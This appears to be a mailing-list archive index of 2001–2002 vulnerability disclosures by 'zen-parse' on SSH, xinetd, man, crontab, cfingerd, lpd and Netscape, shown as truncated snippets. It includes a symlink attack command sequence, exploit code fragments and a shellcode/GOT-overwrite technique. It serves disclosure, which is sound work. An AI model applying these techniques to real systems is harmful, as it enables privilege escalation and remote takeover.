SSH allows deletion of other users files...

2001-06-04 Thread zen-parse
zen]$ rm -r /tmp/ssh-XXW9hNY9/; ln -s / /tmp/ssh-XXW9hNY9 [zen@clarity zen]$ logout Connection to localhost closed. [root@clarity /root]# ls /cookies /bin/ls: /cookies: No such file or directory --zen-parse

OpenSSH_2.5.2p2 RH7.0 - version info

2001-06-05 Thread zen-parse
Sorry, I forgot some relevant information. With regards to previous post: Tested on:- Red Hat Linux release 7.0 (Guinness) [zen-parse@clarity zen-parse]$ rpm -qf /usr/sbin/sshd openssh-server-2.5.2p2-1.7.2 [zen-parse@clarity zen-parse]$ ssh -V OpenSSH_2.5.2p2, SSH protocols 1.5/2.0, OpenSSL

potential buffer overflow in xinetd-2.1.8.9pre11-1

2001-06-08 Thread zen-parse
then we have a buffer overflow. With the ftp service I was only able to get a 1022 byte buffer written but with other services with longer names that use authentication, this could be a serious problem. The server is still running as root while this happens. --zen-parse

man 1.5h10 + man 1.5i-4 exploits

2001-06-11 Thread zen-parse
by user invoking man) == --zen-parse Mon Jun 4 23:17:50 NZST 2001 ** Most of the exploit tweaking involves details covered here, or the set up of programs for the exploits to work with.

RH 7.0 Crontab exploit - apparently fixed

2001-06-26 Thread zen-parse
, I hope. Could possibly be useful with the (still unpatched) makewhatis.cron bug. -- zen-parse /*** #define SAFER [1000] /***/ int shake(int script kiddy

reading from execve()ed setuid memory

2001-06-27 Thread zen-parse
/%d/mem,p); close(0); f=fopen(y,r); fseek(f,WHERETOREAD,SEEK_SET); execl(/tmp/vuln-prog,scary,/tmp/myscript,0); } EOF -- zen-parse

xloadimage remote exploit - tstot.c

2001-07-10 Thread zen-parse
//tstot.c / zen-parse presents tstot.c - remote portbinding exploit for RedHat 7.0 Netscape 4.77

Happy 3 month anniversary cfingerd remote bug!

2001-07-11 Thread zen-parse
fopen() call to popen() and executes code from ~/.nofinger Read the comments. -- zen-parse M4D PR0PZ T0 : Steven for showing me da bugz noid 4 b3in6 7h3r3 wh3n no1 3153 w4z grue 4 lurking, g00bER 4 something and the rest of #roothat

ADV/EXP:pic/lpd remote exploit - RH 7.0

2001-07-26 Thread zen-parse
\n); tmp=eos(retstr); sprintf(tmp,of groff.\n); tmp=eos(retstr); return retstr; } end pic-lpr-remote.c -- - - - - - -- http://mp3.com/cosv - It's not just a music site! -- -- zen-parse -- (photon bed

zero-width gif: exploit PoC for NS6.2.3 (fixed in 7.0) [Was: GIFsGood, Flash Executable Bad]

2002-09-06 Thread zen-parse
for?) an advisory from Netscape at some point soon for this and the other patched issues. -- zen-parse -- - 1) If this message was posted to a public forum by [EMAIL PROTECTED], it may be redistributed without modification. 2

Netscape/Mozilla: Exploitable heap corruption via jar: URI handler.

2002-11-16 Thread zen-parse
pointer for PR_Free in the global offset table of libsnpr4.so. Shellcode can be supplied in a previously loaded image. (A large area can be filled using compressed image files stored in a .jar as the source.) == -- zen-parse

Netscape Problems.

2002-11-26 Thread zen-parse
to Javascript. July 13 === Microsoft closes off on JS bug. Patch becomes available eventually, as threat was not seen as high by Microsoft. +++ Netscape informed of second PNG bug/exploit method. == Sent == Date: Sat, 13 Jul 2002 04:04:56 +1200 (NZST) From: zen-parse [EMAIL PROTECTED

Re: Netscape Problems.

2002-11-28 Thread zen-parse
is insecure, so how about Open Source software is as secure as Closed Source. Many eyes would make code more secure, but only if they are actually looking at the code. But that does not happen. -- zen-parse -- - 1